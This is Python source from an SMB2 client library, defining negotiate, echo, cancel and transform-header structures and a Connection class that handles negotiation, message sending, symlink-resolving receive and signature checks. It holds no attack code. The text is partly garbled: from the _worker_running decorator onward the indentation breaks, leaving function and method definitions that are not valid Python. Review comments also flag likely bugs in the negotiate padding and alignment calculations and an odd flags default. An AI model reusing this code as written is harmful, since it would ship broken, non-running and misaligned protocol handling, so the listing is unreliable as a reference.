            ('flags', FlagField(
                size=4,
                flag_type=Smb2Flags,
            )),
            ('next_command', IntField(size=4)),
            ('message_id', IntField(size=8)),
            ('reserved', IntField(size=4)),
            ('tree_id', IntField(size=4)),
            ('session_id', IntField(size=8)),
            ('signature', BytesField(
                size=16,
                default=b"\x00" * 16,
            )),
            # Command payload following the header; not a spec field.
            ('data', BytesField()),
        ])
        super(SMB2HeaderResponse, self).__init__()
class SMB2NegotiateRequest(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3 SMB2 Negotiate Request
    The SMB2 NEGOTIATE Request packet is used by the client to notify the
    server what dialects of the SMB2 Protocol the client understands. This is
    only used if the client explicitly sets the Dialect to use to a version
    less than 3.1.1. Dialect 3.1.1 added support for negotiate_context and
    SMB3NegotiateRequest should be used to support that.
    """
    COMMAND = Commands.SMB2_NEGOTIATE
    def __init__(self):
        self.fields = OrderedDict([
            ('structure_size', IntField(
                size=2,
                default=36,
            )),
            # Derived from the dialects list at pack time.
            ('dialect_count', IntField(
                size=2,
                default=lambda s: len(s['dialects'].get_value()),
            )),
            ('security_mode', FlagField(
                size=2,
                flag_type=SecurityMode
            )),
            ('reserved', IntField(size=2)),
            ('capabilities', FlagField(
                size=4,
                flag_type=Capabilities,
            )),
            ('client_guid', UuidField()),
            ('client_start_time', IntField(size=8)),
            # Each dialect is a 2-byte enum value.
            ('dialects', ListField(
                size=lambda s: s['dialect_count'].get_value() * 2,
                list_count=lambda s: s['dialect_count'].get_value(),
                list_type=EnumField(size=2, enum_type=Dialects),
            )),
        ])
        super(SMB2NegotiateRequest, self).__init__()
class SMB3NegotiateRequest(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3 SMB2 Negotiate Request
    Like SMB2NegotiateRequest but with support for setting a list of
    Negotiate Context values. This is used by default and is for Dialects 3.1.1
    or greater.
    """
    COMMAND = Commands.SMB2_NEGOTIATE
    def __init__(self):
        self.fields = OrderedDict([
            ('structure_size', IntField(
                size=2,
                default=36,
            )),
            # Derived from the dialects list at pack time.
            ('dialect_count', IntField(
                size=2,
                default=lambda s: len(s['dialects'].get_value()),
            )),
            ('security_mode', FlagField(
                size=2,
                flag_type=SecurityMode,
            )),
            ('reserved', IntField(size=2)),
            ('capabilities', FlagField(
                size=4,
                flag_type=Capabilities,
            )),
            ('client_guid', UuidField()),
            ('negotiate_context_offset', IntField(
                size=4,
                default=lambda s: self._negotiate_context_offset_value(s),
            )),
            ('negotiate_context_count', IntField(
                size=2,
                default=lambda s: len(s['negotiate_context_list'].get_value()),
            )),
            ('reserved2', IntField(size=2)),
            ('dialects', ListField(
                size=lambda s: s['dialect_count'].get_value() * 2,
                list_count=lambda s: s['dialect_count'].get_value(),
                list_type=EnumField(size=2, enum_type=Dialects),
            )),
            # Zero bytes inserted so the first negotiate context lands on
            # the offset computed by _padding_size.
            ('padding', BytesField(
                size=lambda s: self._padding_size(s),
                default=lambda s: b"\x00" * self._padding_size(s),
            )),
            ('negotiate_context_list', ListField(
                list_count=lambda s: s['negotiate_context_count'].get_value(),
                unpack_func=lambda s, d: self._negotiate_context_list(s, d),
            )),
        ])
        super(SMB3NegotiateRequest, self).__init__()
    def _negotiate_context_offset_value(self, structure):
        # The offset from the beginning of the SMB2 header to the first, 8-byte
        # aligned, negotiate context
        header_size = 64
        negotiate_size = structure['structure_size'].get_value()
        dialect_size = len(structure['dialects'])
        padding_size = self._padding_size(structure)
        return header_size + negotiate_size + dialect_size + padding_size
    def _padding_size(self, structure):
        # Pad bytes between the end of the dialects array and the first
        # negotiate context.
        # NOTE(review): returning ``mod`` (rather than ``8 - mod`` as the
        # sibling SMB2NegotiateResponse._padding_size does) only yields
        # 8-byte alignment for some dialect counts - confirm against
        # MS-SMB2 2.2.3 and the upstream implementation.
        mod = (structure['dialect_count'].get_value() * 2) % 8
        return 0 if mod == 0 else mod
    def _negotiate_context_list(self, structure, data):
        # Unpack negotiate_context_count entries from the raw byte stream.
        context_count = structure['negotiate_context_count'].get_value()
        context_list = []
        for idx in range(0, context_count):
            field, data = self._parse_negotiate_context_entry(data, idx)
            context_list.append(field)
        return context_list
    def _parse_negotiate_context_entry(self, data, idx):
        # data_length sits at bytes 2-3 of each context entry; the entry
        # consumes an 8-byte fixed header plus data_length bytes.
        # NOTE(review): unlike the response-side parser, this does not skip
        # alignment padding between entries - verify with multi-context data.
        data_length = struct.unpack("<H", data[2:4])[0]
        negotiate_context = SMB2NegotiateContextRequest()
        negotiate_context.unpack(data[:data_length + 8])
        return negotiate_context, data[8 + data_length:]
class SMB2NegotiateContextRequest(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3.1 SMB2 NEGOTIATE_CONTEXT Request Values
    The SMB2_NEGOTIATE_CONTEXT structure is used by the SMB2 NEGOTIATE Request
    and the SMB2 NEGOTIATE Response to encode additional properties.
    """
    COMMAND = Commands.SMB2_NEGOTIATE
    def __init__(self):
        self.fields = OrderedDict([
            ('context_type', EnumField(
                size=2,
                enum_type=NegotiateContextType,
            )),
            ('data_length', IntField(
                size=2,
                default=lambda s: len(s['data'].get_value()),
            )),
            ('reserved', IntField(size=4)),
            # The concrete structure is selected from context_type at
            # pack/unpack time by _data_structure_type.
            ('data', StructureField(
                size=lambda s: s['data_length'].get_value(),
                structure_type=lambda s: self._data_structure_type(s)
            )),
            # not actually a field but each list entry must start at the 8 byte
            # alignment
            ('padding', BytesField(
                size=lambda s: self._padding_size(s),
                default=lambda s: b"\x00" * self._padding_size(s),
            ))
        ])
        super(SMB2NegotiateContextRequest, self).__init__()
    def _data_structure_type(self, structure):
        # Map the context_type enum onto the structure class used for the
        # data payload; returns None (untyped bytes) for unknown types.
        con_type = structure['context_type'].get_value()
        if con_type == \
                NegotiateContextType.SMB2_PREAUTH_INTEGRITY_CAPABILITIES:
            return SMB2PreauthIntegrityCapabilities
        elif con_type == NegotiateContextType.SMB2_ENCRYPTION_CAPABILITIES:
            return SMB2EncryptionCapabilities
        elif con_type == NegotiateContextType.SMB2_COMPRESSION_CAPABILITIES:
            return SMB2CompressionCapabilities
    def _padding_size(self, structure):
        # NOTE(review): for data_size > 8 that is an exact multiple of 8 this
        # returns 8 (an extra full block of padding) rather than 0 - confirm
        # against MS-SMB2 2.2.3.1 alignment rules.
        data_size = len(structure['data'])
        return 8 - data_size if data_size <= 8 else 8 - (data_size % 8)
class SMB2PreauthIntegrityCapabilities(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3.1.1 SMB2_PREAUTH_INTEGRITY_CAPABILITIES
    The SMB2_PREAUTH_INTEGRITY_CAPABILITIES context is specified in an SMB2
    NEGOTIATE request by the client to indicate which preauthentication
    integrity hash algorithms it supports and to optionally supply a
    preauthentication integrity hash salt value.
    """
    def __init__(self):
        self.fields = OrderedDict([
            # Both counts are derived from their lists at pack time.
            ('hash_algorithm_count', IntField(
                size=2,
                default=lambda s: len(s['hash_algorithms'].get_value()),
            )),
            ('salt_length', IntField(
                size=2,
                default=lambda s: len(s['salt']),
            )),
            # Each algorithm ID is a 2-byte HashAlgorithms enum value.
            ('hash_algorithms', ListField(
                size=lambda s: s['hash_algorithm_count'].get_value() * 2,
                list_count=lambda s: s['hash_algorithm_count'].get_value(),
                list_type=EnumField(size=2, enum_type=HashAlgorithms),
            )),
            ('salt', BytesField(
                size=lambda s: s['salt_length'].get_value(),
            )),
        ])
        super(SMB2PreauthIntegrityCapabilities, self).__init__()
class SMB2EncryptionCapabilities(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3.1.2 SMB2_ENCRYPTION_CAPABILITIES
    The SMB2_ENCRYPTION_CAPABILITIES context is specified in an SMB2 NEGOTIATE
    request by the client to indicate which encryption algorithms the client
    supports.
    """
    def __init__(self):
        self.fields = OrderedDict([
            # Derived from the ciphers list at pack time.
            ('cipher_count', IntField(
                size=2,
                default=lambda s: len(s['ciphers'].get_value()),
            )),
            # Each cipher ID is a 2-byte Ciphers enum value.
            ('ciphers', ListField(
                size=lambda s: s['cipher_count'].get_value() * 2,
                list_count=lambda s: s['cipher_count'].get_value(),
                list_type=EnumField(size=2, enum_type=Ciphers),
            )),
        ])
        super(SMB2EncryptionCapabilities, self).__init__()
class SMB2CompressionCapabilities(Structure):
    """
    [MS-SMB2]
    2.2.3.1.3 SMB2_COMPRESSION_CAPABILITIES
    """
    def __init__(self):
        self.fields = OrderedDict([
            ('compression_algorithm_count', IntField(
                size=2,
                default=lambda s: len(s['compression_algorithms'].get_value()),
            )),
            # 2 bytes of padding required by the wire format.
            ('fpadding', IntField(
                size=2,
                default=0,
            )),
            # NOTE(review): hard-coded flags value; MS-SMB2 defines this field
            # as Flags (e.g. SMB2_COMPRESSION_CAPABILITIES_FLAG_*) - confirm
            # b"\x01\x00\x00\x01" against the spec before changing.
            ('flags', BytesField(
                size=4,
                default=b"\x01\x00\x00\x01",
            )),
            # Each algorithm ID is a 2-byte CompressionAlgos enum value.
            ('compression_algorithms', ListField(
                size=lambda s: s['compression_algorithm_count'].get_value() * 2,
                list_count=lambda s: s['compression_algorithm_count'].get_value(),
                list_type=EnumField(size=2, enum_type=CompressionAlgos),
            )),
        ])
        super(SMB2CompressionCapabilities, self).__init__()
class SMB2NegotiateResponse(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.4 SMB2 NEGOTIATE Response
    The SMB2 NEGOTIATE Response packet is sent by the server to notify the
    client of the preferred common dialect.
    """
    COMMAND = Commands.SMB2_NEGOTIATE
    def __init__(self):
        self.fields = OrderedDict([
            ('structure_size', IntField(
                size=2,
                default=65,
            )),
            ('security_mode', FlagField(
                size=2,
                flag_type=SecurityMode,
            )),
            ('dialect_revision', EnumField(
                size=2,
                enum_type=Dialects,
            )),
            # Only meaningful (non-zero) when dialect_revision is 3.1.1.
            ('negotiate_context_count', IntField(
                size=2,
                default=lambda s: self._negotiate_context_count_value(s),
            )),
            ('server_guid', UuidField()),
            ('capabilities', FlagField(
                size=4,
                flag_type=Capabilities
            )),
            ('max_transact_size', IntField(size=4)),
            ('max_read_size', IntField(size=4)),
            ('max_write_size', IntField(size=4)),
            ('system_time', DateTimeField()),
            ('server_start_time', DateTimeField()),
            ('security_buffer_offset', IntField(
                size=2,
                default=128,  # (header size 64) + (structure size 64)
            )),
            ('security_buffer_length', IntField(
                size=2,
                default=lambda s: len(s['buffer'].get_value()),
            )),
            ('negotiate_context_offset', IntField(
                size=4,
                default=lambda s: self._negotiate_context_offset_value(s),
            )),
            # The GSS/SPNEGO security token.
            ('buffer', BytesField(
                size=lambda s: s['security_buffer_length'].get_value(),
            )),
            # Zero bytes so the first negotiate context is 8-byte aligned.
            ('padding', BytesField(
                size=lambda s: self._padding_size(s),
                default=lambda s: b"\x00" * self._padding_size(s),
            )),
            ('negotiate_context_list', ListField(
                list_count=lambda s: s['negotiate_context_count'].get_value(),
                unpack_func=lambda s, d:
                self._negotiate_context_list(s, d),
            )),
        ])
        super(SMB2NegotiateResponse, self).__init__()
    def _negotiate_context_count_value(self, structure):
        # If the dialect_revision is SMBv3.1.1, this field specifies the
        # number of negotiate contexts in negotiate_context_list; otherwise
        # this field must not be used and must be reserved (0).
        if structure['dialect_revision'].get_value() == Dialects.SMB_3_1_1:
            return len(structure['negotiate_context_list'].get_value())
        else:
            return None
    def _negotiate_context_offset_value(self, structure):
        # If the dialect_revision is SMBv3.1.1, this field specifies the offset
        # from the beginning of the SMB2 header to the first 8-byte
        # aligned negotiate context entry in negotiate_context_list; otherwise
        # this field must not be used and must be reserved (0).
        if structure['dialect_revision'].get_value() == Dialects.SMB_3_1_1:
            buffer_offset = structure['security_buffer_offset'].get_value()
            buffer_size = structure['security_buffer_length'].get_value()
            padding_size = self._padding_size(structure)
            return buffer_offset + buffer_size + padding_size
        else:
            return None
    def _padding_size(self, structure):
        # Padding between the end of the buffer value and the first Negotiate
        # context value so that the first value is 8-byte aligned. Padding is
        # not required if there are not negotiate contexts
        if structure['negotiate_context_count'].get_value() == 0:
            return 0
        mod = structure['security_buffer_length'].get_value() % 8
        return 0 if mod == 0 else 8 - mod
    def _negotiate_context_list(self, structure, data):
        # Unpack negotiate_context_count entries from the raw byte stream.
        context_count = structure['negotiate_context_count'].get_value()
        context_list = []
        for idx in range(0, context_count):
            field, data = self._parse_negotiate_context_entry(data)
            context_list.append(field)
        return context_list
    def _parse_negotiate_context_entry(self, data):
        # Each entry is an 8-byte fixed header plus data_length bytes,
        # rounded up to the next 8-byte boundary before the next entry.
        data_length = struct.unpack("<H", data[2:4])[0]
        negotiate_context = SMB2NegotiateContextRequest()
        negotiate_context.unpack(data[:data_length + 8])
        padded_size = data_length % 8
        if padded_size != 0:
            padded_size = 8 - padded_size
        return negotiate_context, data[8 + data_length + padded_size:]
class SMB2Echo(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.28 SMB2 Echo Request/Response
    Body of an SMB2 ECHO packet; the same 4-byte layout is used for both
    the request and the response.
    """
    COMMAND = Commands.SMB2_ECHO

    def __init__(self):
        # Fixed 4-byte body: structure_size (always 4) plus a reserved word.
        self.fields = OrderedDict()
        self.fields['structure_size'] = IntField(size=2, default=4)
        self.fields['reserved'] = IntField(size=2)
        super(SMB2Echo, self).__init__()
class SMB2CancelRequest(Structure):
    """
    [MS-SMB2] 2.2.30 - SMB2 CANCEL Request
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/91913fc6-4ec9-4a83-961b-370070067e63
    Sent by the client to cancel a previously sent message on the same SMB2
    transport connection.
    """
    COMMAND = Commands.SMB2_CANCEL

    def __init__(self):
        # Fixed 4-byte body: structure_size (always 4) plus a reserved word.
        self.fields = OrderedDict()
        self.fields['structure_size'] = IntField(size=2, default=4)
        self.fields['reserved'] = IntField(size=2)
        super(SMB2CancelRequest, self).__init__()
class SMB2TransformHeader(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.41 SMB2 TRANSFORM_HEADER
    The SMB2 Transform Header is used by the client or server when sending
    encrypted message. This is only valid for the SMB.x dialect family.
    """
    def __init__(self):
        self.fields = OrderedDict([
            # b"\xfdSMB" marks an encrypted (transformed) SMB2 packet.
            ('protocol_id', BytesField(
                size=4,
                default=b"\xfdSMB"
            )),
            ('signature', BytesField(
                size=16,
                default=b"\x00" * 16
            )),
            ('nonce', BytesField(size=16)),
            # Size of the plaintext SMB2 message before encryption.
            ('original_message_size', IntField(size=4)),
            ('reserved', IntField(size=2, default=0)),
            # Default 1 = SMB2_TRANSFORM_FLAG_ENCRYPTED per the cited spec.
            ('flags', IntField(
                size=2,
                default=1
            )),
            ('session_id', IntField(size=8)),
            ('data', BytesField())  # not in spec
        ])
        super(SMB2TransformHeader, self).__init__()
class SMB2CompressionTransformHeader(Structure):
    # [MS-SMB2] 2.2.42 SMB2 COMPRESSION_TRANSFORM_HEADER - wraps a
    # compressed SMB2 message; b"\xfcSMB" marks a compressed packet.
    def __init__(self):
        self.fields = OrderedDict([
            ('protocol_id', BytesField(
                size=4,
                default=b"\xfcSMB"
            )),
            # Size of the uncompressed payload.
            ('original_size', IntField(
                size=4,
                default=0
            )),
            ('compression_algorithm', EnumField(
                size=2, enum_type=CompressionAlgos, default=CompressionAlgos.LZNT1
            )),
            # NOTE(review): the spec defines this field as Flags with values
            # 0x0000/0x0001; the b"\xff\xff" default here looks unusual -
            # confirm against MS-SMB2 before relying on it.
            ('flags', BytesField(
                size=2,
                default=b"\xff\xff"
            )),
            # Offset/length of the compressed region within the payload.
            ('offset', IntField(size=4, default=0)),
            ('data', BytesField())  # not in spec
        ])
        super(SMB2CompressionTransformHeader, self).__init__()
def _worker_running(func):
""" Ensures the message worker thread is still running and hasn't failed for any reason. """
def wrapped(self, *args, **kwargs):
self._check_worker_running()
return func(self, *args, **kwargs)
return wrapped
class Connection(object):
def __init__(self, guid, server_name, port=445, require_signing=True):
    """
    [MS-SMB2] v53.0 2017-09-15
    3.2.1.2 Per SMB2 Transport Connection
    Used as the transport interface for a server. Some values have been
    omitted as they can be retrieved by the Server object stored in
    self.server
    :param guid: A unique guid that represents the client
    :param server_name: The server to start the connection
    :param port: The port to use for the transport, default is 445
    :param require_signing: Whether signing is required on SMB messages
        sent over this connection
    """
    # Fixed log-message typo: "require_singing" -> "require_signing".
    log.info("Initialising connection, guid: %s, require_signing: %s, "
             "server_name: %s, port: %d"
             % (guid, require_signing, server_name, port))
    self.server_name = server_name
    self.port = port
    self.transport = None  # Instantiated in .connect()
    # Table of Session entries, the order is important for smbclient.
    self.session_table = OrderedDict()
    # Table of sessions that have not completed authentication, indexed by
    # session_id
    self.preauth_session_table = {}
    # Table of Requests that have yet to be picked up by the application,
    # it MAY contain a response from the server as well
    self.outstanding_requests = dict()
    # Table of available sequence numbers
    self.sequence_window = dict(
        low=0,
        high=1
    )
    self.sequence_lock = Lock()
    # Byte array containing the negotiate token and remembered for
    # authentication
    self.gss_negotiate_token = None
    self.server_guid = None
    self.max_transact_size = None
    self.max_read_size = None
    self.max_write_size = None
    self.require_signing = require_signing
    # SMB 2.1+
    self.dialect = None
    self.supports_file_leasing = None
    # just go with False as a default for Dialect 2.0.2
    self.supports_multi_credit = False
    self.client_guid = guid
    # SMB 3.x+
    self.salt = None
    self.supports_directory_leasing = None
    self.supports_multi_channel = None
    self.supports_persistent_handles = None
    self.supports_encryption = None
    # NOTE: name is inconsistent with the other supports_* attributes but
    # is kept as-is for backwards compatibility with existing callers.
    self.support_compression = None
    # used for SMB 3.x for secure negotiate verification on tree connect
    self.negotiated_dialects = []
    self.client_capabilities = Capabilities.SMB2_GLOBAL_CAP_LARGE_MTU | \
        Capabilities.SMB2_GLOBAL_CAP_ENCRYPTION
    self.client_security_mode = \
        SecurityMode.SMB2_NEGOTIATE_SIGNING_REQUIRED if \
        require_signing else SecurityMode.SMB2_NEGOTIATE_SIGNING_ENABLED
    self.server_security_mode = None
    self.server_capabilities = None
    # SMB 3.1.1+
    # The hashing algorithm object that was negotiated
    self.preauth_integrity_hash_id = None
    # Preauth integrity hash value computed for the SMB2 NEGOTIATE request
    # contains the messages used to compute the hash
    self.preauth_integrity_hash_value = []
    # The cipher object that was negotiated
    self.cipher_id = None
    # Keep track of the message processing thread's potential traceback that it may raise.
    self._t_exc = None
def connect(self, dialect=None, timeout=60):
    """
    Will connect to the target server and negotiate the capabilities
    with the client. Once setup, the client MUST call the disconnect()
    function to close the listener thread. This function will populate
    various connection properties that denote the capabilities of the
    server.
    :param dialect: If specified, forces the dialect that is negotiated
        with the server, if not set, then the newest dialect supported by
        the server is used up to SMB 3.1.1
    :param timeout: The timeout in seconds to wait for the initial
        negotiation process to complete
    """
    log.info("Setting up transport connection")
    message_queue = Queue()
    self.transport = Tcp(self.server_name, self.port, message_queue, timeout)
    # Daemon thread so a hung message worker cannot keep the process alive.
    t_worker = threading.Thread(target=self._process_message_thread, args=(message_queue,),
                                name="msg_worker-%s:%s" % (self.server_name, self.port))
    t_worker.daemon = True
    t_worker.start()
    log.info("Starting negotiation with SMB server")
    smb_response = self._send_smb2_negotiate(dialect, timeout)
    log.info("Negotiated dialect: %s"
             % str(smb_response['dialect_revision']))
    self.dialect = smb_response['dialect_revision'].get_value()
    self.max_transact_size = smb_response['max_transact_size'].get_value()
    self.max_read_size = smb_response['max_read_size'].get_value()
    self.max_write_size = smb_response['max_write_size'].get_value()
    self.server_guid = smb_response['server_guid'].get_value()
    self.gss_negotiate_token = smb_response['buffer'].get_value()
    # Upgrade to mandatory signing when the server requires it even if the
    # caller did not ask for it.
    if not self.require_signing and \
            smb_response['security_mode'].has_flag(
                SecurityMode.SMB2_NEGOTIATE_SIGNING_REQUIRED):
        self.require_signing = True
    log.info("Connection require signing: %s" % self.require_signing)
    capabilities = smb_response['capabilities']
    # SMB 2.1
    if self.dialect >= Dialects.SMB_2_1_0:
        self.supports_file_leasing = \
            capabilities.has_flag(Capabilities.SMB2_GLOBAL_CAP_LEASING)
        self.supports_multi_credit = \
            capabilities.has_flag(Capabilities.SMB2_GLOBAL_CAP_LARGE_MTU)
    # SMB 3.x
    if self.dialect >= Dialects.SMB_3_0_0:
        self.supports_directory_leasing = capabilities.has_flag(
            Capabilities.SMB2_GLOBAL_CAP_DIRECTORY_LEASING)
        self.supports_multi_channel = capabilities.has_flag(
            Capabilities.SMB2_GLOBAL_CAP_MULTI_CHANNEL)
        # TODO: SMB2_GLOBAL_CAP_PERSISTENT_HANDLES
        self.supports_persistent_handles = False
        # For 3.1.1 encryption support is derived from the negotiate
        # contexts below, not from the capability bit.
        self.supports_encryption = capabilities.has_flag(
            Capabilities.SMB2_GLOBAL_CAP_ENCRYPTION) \
            and self.dialect < Dialects.SMB_3_1_1
        self.server_capabilities = capabilities
        self.server_security_mode = \
            smb_response['security_mode'].get_value()
        # TODO: Check/add server to server_list in Client Page 203
    # SMB 3.1
    if self.dialect >= Dialects.SMB_3_1_1:
        for context in smb_response['negotiate_context_list']:
            if context['context_type'].get_value() == \
                    NegotiateContextType.SMB2_ENCRYPTION_CAPABILITIES:
                cipher_id = context['data']['ciphers'][0]
                self.cipher_id = Ciphers.get_cipher(cipher_id)
                self.supports_encryption = self.cipher_id != 0
            elif context['context_type'].get_value() == \
                    NegotiateContextType.SMB2_PREAUTH_INTEGRITY_CAPABILITIES:
                hash_id = context['data']['hash_algorithms'][0]
                self.preauth_integrity_hash_id = \
                    HashAlgorithms.get_algorithm(hash_id)
def disconnect(self, close=True):
    """
    Shut down this connection: optionally disconnect every session first,
    then close the TCP transport which stops the socket listener thread.

    :param close: When True, also disconnect all sessions in the
        connection (each session closes its own tree connects).
    """
    # Snapshot the sessions up front - disconnecting a session presumably
    # mutates session_table, mirroring the original's list() copy.
    sessions = list(self.session_table.values()) if close else []
    for sess in sessions:
        sess.disconnect(True)
    log.info("Disconnecting transport connection")
    self.transport.close()
def send(self, message, sid=None, tid=None, credit_request=None, message_id=None, async_id=None):
    """
    Send a single SMB message to the server and return its Request object
    (which carries the final unencrypted header).
    :param message: An SMB message structure to send.
    :param sid: A session_id that the message is sent for.
    :param tid: A tree_id object that the message is sent for.
    :param credit_request: Specifies extra credits to be requested with the SMB header.
    :param message_id: The message_id for the header, only useful for a cancel request.
    :param async_id: The async_id for the header, only useful for a cancel request.
    :return: Request of the message that was sent.
    """
    # Delegate to the compound sender with a one-element batch and unwrap
    # the single resulting Request.
    requests = self._send(
        [message],
        session_id=sid,
        tree_id=tid,
        message_id=message_id,
        credit_request=credit_request,
        async_id=async_id,
    )
    return requests[0]
def send_compound(self, messages, sid, tid, related=False):
    """
    Send multiple messages within one TCP request; fails if the combined
    size exceeds the transport maximum.
    :param messages: A list of messages to send to the server.
    :param sid: The session_id that the request is sent for.
    :param tid: A tree_id object that the message is sent for.
    :param related: Whether each message is related to each other, sets the Session, Tree, and File Id to the same
        value as the first message.
    :return: List<Request> for each request that was sent, each entry in the list is in the same order of the
        message list that was passed in.
    """
    requests = self._send(
        messages,
        session_id=sid,
        tree_id=tid,
        related=related,
    )
    return requests
@_worker_running
def receive(self, request, wait=True, timeout=None, resolve_symlinks=True):
    """
    Polls the message buffer of the TCP connection and waits until a valid
    message is received based on the message_id passed in.

    :param request: The Request object to wait get the response for
    :param wait: Wait for the final response in the case of a STATUS_PENDING response, the pending response is
        returned in the case of wait=False
    :param timeout: Set a timeout used while waiting for the final response from the server.
    :param resolve_symlinks: Set to automatically resolve symlinks in the path when opening a file or directory.
    :return: SMB2HeaderResponse of the received message
    """
    start_time = time.time()

    while True:
        # Recompute the remaining wait each pass so the total deadline covers
        # repeated STATUS_PENDING iterations, with a 1 second floor.
        iter_timeout = int(max(timeout - (time.time() - start_time), 1)) if timeout is not None else None
        if not request.response_event.wait(timeout=iter_timeout):
            raise SMBException("Connection timeout of %d seconds exceeded while waiting for a message id %s "
                               "response from the server" % (timeout, request.message['message_id'].get_value()))

        # Use a lock on the request so that in the case of a pending response we have exclusive lock on the event
        # flag and can clear it without the future pending response taking it over before we first clear the flag.
        with request.response_event_lock:
            self._check_worker_running()  # The worker may have failed while waiting for the response, check again

            response = request.response
            status = response['status'].get_value()
            if status == NtStatus.STATUS_PENDING and wait:
                # Received a pending message, clear the response_event flag and wait again.
                request.response_event.clear()
                continue
            elif status == NtStatus.STATUS_STOPPED_ON_SYMLINK and resolve_symlinks:
                # Received when we do an Open on a path that contains a symlink. Need to capture all related
                # requests and resend the Open + others with the redirected path. First we need to resolve the
                # symlink path. This will fail if the symlink is pointing to a location that is not in the same
                # tree/share as the original request.

                # First wait for the other remaining requests to be processed. Their status will also fail and we
                # need to make sure we update the old request with the new one properly.
                related_requests = [self.outstanding_requests[i] for i in request.related_ids]
                [r.response_event.wait() for r in related_requests]

                # Now create a new request with the new path the symlink points to.
                session = self.session_table[request.session_id]
                tree = session.tree_connect_table[request.message['tree_id'].get_value()]

                old_create = request.get_message_data()
                tree_share_name = tree.share_name + u'\\'
                original_path = tree_share_name + to_text(old_create['buffer_path'].get_value(),
                                                          encoding='utf-16-le')

                # The error response carries the symlink reparse buffer used
                # to compute the substitute path.
                exp = SMBResponseException(response, status)
                reparse_buffer = next((e for e in exp.error_details
                                       if isinstance(e, SMB2SymbolicLinkErrorResponse)))
                new_path = reparse_buffer.resolve_path(original_path)[len(tree_share_name):]

                new_open = Open(tree, new_path)
                create_req = new_open.create(
                    old_create['impersonation_level'].get_value(),
                    old_create['desired_access'].get_value(),
                    old_create['file_attributes'].get_value(),
                    old_create['share_access'].get_value(),
                    old_create['create_disposition'].get_value(),
                    old_create['create_options'].get_value(),
                    create_contexts=old_create['buffer_contexts'].get_value(),
                    send=False
                )[0]

                # Now add all the related requests (if any) to send as a compound request.
                new_msgs = [create_req] + [r.get_message_data() for r in related_requests]
                new_requests = self.send_compound(new_msgs, session.session_id, tree.tree_connect_id, related=True)

                # Verify that the first request was successful before updating the related requests with the new
                # info.
                error = None
                try:
                    new_response = self.receive(new_requests[0], wait=wait, timeout=timeout, resolve_symlinks=True)
                except SMBResponseException as exc:
                    # We need to make sure we fix up the remaining responses before throwing this.
                    error = exc
                [r.response_event.wait() for r in new_requests]

                # Update the old requests with the new response information
                for i, old_request in enumerate([request] + related_requests):
                    del self.outstanding_requests[old_request.message['message_id'].get_value()]
                    old_request.update_request(new_requests[i])

                if error:
                    raise error

                return new_response
            elif status not in [NtStatus.STATUS_SUCCESS, NtStatus.STATUS_PENDING]:
                raise SMBResponseException(response, status)
            else:
                break

    # now we have a retrieval request for the response, we can delete
    # the request from the outstanding requests
    message_id = request.message['message_id'].get_value()
    del self.outstanding_requests[message_id]

    return response
def echo(self, sid=0, timeout=60, credit_request=1):
    """
    Sends an SMB2 Echo request, mainly useful to request extra credits.

    On a Samba server the sid can be 0, but a Windows SMB server requires
    the sid of an authenticated session or it will close the socket.

    :param sid: When talking to a Windows host this must be populated with
        a valid session_id from a negotiated session
    :param timeout: The timeout in seconds to wait for the Echo Response
    :param credit_request: The number of credits to request
    :return: the credits that were granted by the server
    """
    log.info("Sending Echo request with a timeout of %d and credit "
             "request of %d" % (timeout, credit_request))

    echo_req = SMB2Echo()
    log.debug(echo_req)
    request = self.send(echo_req, sid=sid, credit_request=credit_request)

    log.info("Receiving Echo response")
    response = self.receive(request, timeout=timeout)
    granted = response['credit_response'].get_value()
    log.info("Credits granted from the server echo response: %d" % granted)

    echo_resp = SMB2Echo()
    echo_resp.unpack(response['data'].get_value())
    log.debug(echo_resp)

    return granted
def verify_signature(self, header, session_id, force=False):
    """
    Verifies the SMB2 Header request/response signature.

    :param header: The SMB2Header whose signature is verified against the session signing key.
    :param session_id: The Session Id denoting which session security verifies the message.
    :param force: Verify even when the header would normally be exempt from signing checks.
    """
    message_id = header['message_id'].get_value()
    flags = header['flags']
    status = header['status'].get_value()
    command = header['command'].get_value()

    if not force:
        # Unsigned by design: cancel-style placeholder ids, headers without
        # the SIGNED flag, interim PENDING responses, and session setup.
        exempt = (
            message_id == 0xFFFFFFFFFFFFFFFF
            or not flags.has_flag(Smb2Flags.SMB2_FLAGS_SIGNED)
            or status == NtStatus.STATUS_PENDING
            or command == Commands.SMB2_SESSION_SETUP
        )
        if exempt:
            return

    session = self.session_table.get(session_id, None)
    if session is None:
        raise SMBException("Failed to find session %s for message verification" % session_id)

    expected = self._generate_signature(header.pack(), session.signing_key)
    actual = header['signature'].get_value()
    if actual != expected:
        raise SMBException("Server message signature could not be verified: %s != %s"
                           % (to_native(binascii.hexlify(actual)), to_native(binascii.hexlify(expected))))
def _check_worker_running(self):
    """ Checks that the message worker thread is still running and raises it's exception if it has failed. """
    worker_exc = self._t_exc
    if worker_exc is None:
        return
    # The worker hit a fatal error: tear down the transport, then surface it.
    self.disconnect(False)
    raise worker_exc
@_worker_running
def _send(self, messages, session_id=None, tree_id=None, message_id=None, credit_request=None, related=False,
          async_id=None):
    # Builds, signs and (optionally) compresses/encrypts one or more SMB2
    # messages into a single TCP payload and registers a Request for each.
    send_data = b""
    requests = []
    session = self.session_table.get(session_id, None)
    tree = None
    if tree_id and session:
        if tree_id not in session.tree_connect_table:
            raise SMBException("Cannot find Tree with the ID %d in the session tree table" % tree_id)
        tree = session.tree_connect_table[tree_id]

    total_requests = len(messages)
    for i, message in enumerate(messages):
        if i == total_requests - 1:
            next_command = 0
            padding = b""
        else:
            # each compound message must start at the 8-byte boundary
            msg_length = 64 + len(message)
            mod = msg_length % 8
            padding_length = 8 - mod if mod > 0 else 0
            next_command = msg_length + padding_length
            padding = b"\x00" * padding_length

        # When running with multiple threads we need to ensure that getting the message id and adjusting the
        # sequence windows is done in a thread safe manner so we use a lock to ensure only 1 thread accesses the
        # sequence window at a time.
        with self.sequence_lock:
            sequence_window_low = self.sequence_window['low']
